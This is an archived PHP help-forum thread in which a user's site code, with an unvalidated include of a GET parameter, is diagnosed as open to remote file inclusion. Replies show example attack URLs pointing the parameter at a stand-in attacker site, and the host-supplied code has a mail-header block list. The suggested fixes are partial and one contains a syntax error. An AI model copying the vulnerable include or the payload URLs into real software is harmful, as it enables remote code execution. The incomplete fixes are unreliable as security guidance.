Jump to content

Archived

This topic is now archived and is closed to further replies.

Pixelsize

[Resolved] Is this an exploit?

Recommended Posts

Hi there, I think this is the place where to post this question.

At the webhosting I'm at, they keep suspending my webpage because my code is vulnerable to attacks. This is the code:

[code]<?

// Security patch against spam exploit

// Provided by TangoWebs

$badStrings = array("Content-Type:", "MIME-Version:", "Content-Transfer-Encoding:", "bcc:", "cc:");

foreach($_POST as $k => $v){

foreach($badStrings as $v2){

if(strpos($v, $v2) !== false){

header("HTTP/1.0 403 Forbidden");

exit;

}

}

}

?>

<title>Heh I didn't wanna show the site's title xD sry xD</title>

<link href="style.css" rel="stylesheet" type="text/css">

<?php

// Variables

$page=$_GET['page']; // Gets info



// Display

include "header.html"; // Shows Header



if ($page=="") {

$page="home";

}

$page=$page . ".html";

include $page;



include "footer.html";

?>[/code]

TangoWebs is the name of the webhosting company... they provided this code and asked me to put it, and they say hackers are still sending e-mails, mail bombing, or whatever... from my website. This is just one page, but they are all exactly same, just change on what directory to include. Thanks for your time, I hope anyone could see what I still can't. Cya!!  :D

Share this post


Link to post
Share on other sites
would need to see the code for generating the e-malis, how the user submits the content for the e-mail and any associated login stuff (like if the user must be logged in and a session is created.).

The only thing I could suggest in this little lot is this.

record the ip address the request originated from and store this in the database along with the time of the request.  Each time the script runs it should check the ip address against the database and if there is not sufficient time between the last e-mail and now - deny the request.

I think a 10 minutes interval would be sufficient.....

Share this post


Link to post
Share on other sites
No login, no forms... this is all... They say they won't reactivate my account until I can ensure that the code has no security wholes :S So I can't do tests... But do you think anyone could just send e-mails by taking advantage of... what? a $_GET???

Share this post


Link to post
Share on other sites
well in that case the only vunerability is the include $page bit.

Say soneone had a page they had written to send out mass e-mails and it was located here:

http://www.dodgeysite.com/email.php

they could use your page to exploit that by simply setting page=http://www.dodgeysite.com/email.php in the url.

On my sites i always use a control on includes that are driven by the users input.

my includes always look like

include($_SERVER['DOCUMENT_ROOT'] . $page);

that way the file being included MUST reside on your domain.

Share this post


Link to post
Share on other sites
This code here is very vunerable!
[code]if ($page=="") {

$page="home";

}

$page=$page . ".html";

include $page;[/code]
A malicous attacker can put something like this:
yoursite.com?page=http://attackersite.com/badfile.html
Now within that badfile the attackers made there could be PHP code with would not only affect your account, but everyone elses account on the hosts server, such cause hacvock with the database

So whats the way around this. To validate the user input. Before you include make sure:
- the page variable doesnt hold urls - preg_match can help you there
- make sure the file you are going to be including is actually exists on your site - file_exists can help here to

With file_exists dont do this:
if(file_exists($_GET['page']))

append your sites document roort to it like so:
if(file_exists($_SERVER[['DOCUMENT_ROOT'] . $_GET['page']))

Never use raw _GET or POST'd data! Always validate and verify user input.

Share this post


Link to post
Share on other sites
There was recently a discussion similar to this one that you should find useful.
http://www.phpfreaks.com/forums/index.php/topic,95407.msg382014.html#msg382014

Share this post


Link to post
Share on other sites
xD!!! GOSH!!! WHAT AN OBVIOUS EXPLOIT, ye, I'll fix it right away - thank you all for your time... gosh, so obvious xD. Thank you all. Cya!

Share this post


Link to post
Share on other sites
[quote author=wildteen88 link=topic=99803.msg393230#msg393230 date=1152296362]
append your sites document root to it like so:
if(file_exists($_SERVER[['DOCUMENT_ROOT'] . $_GET['page']))
[/quote]
That's a really useful - thankyou :)

Share this post


Link to post
Share on other sites

×

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.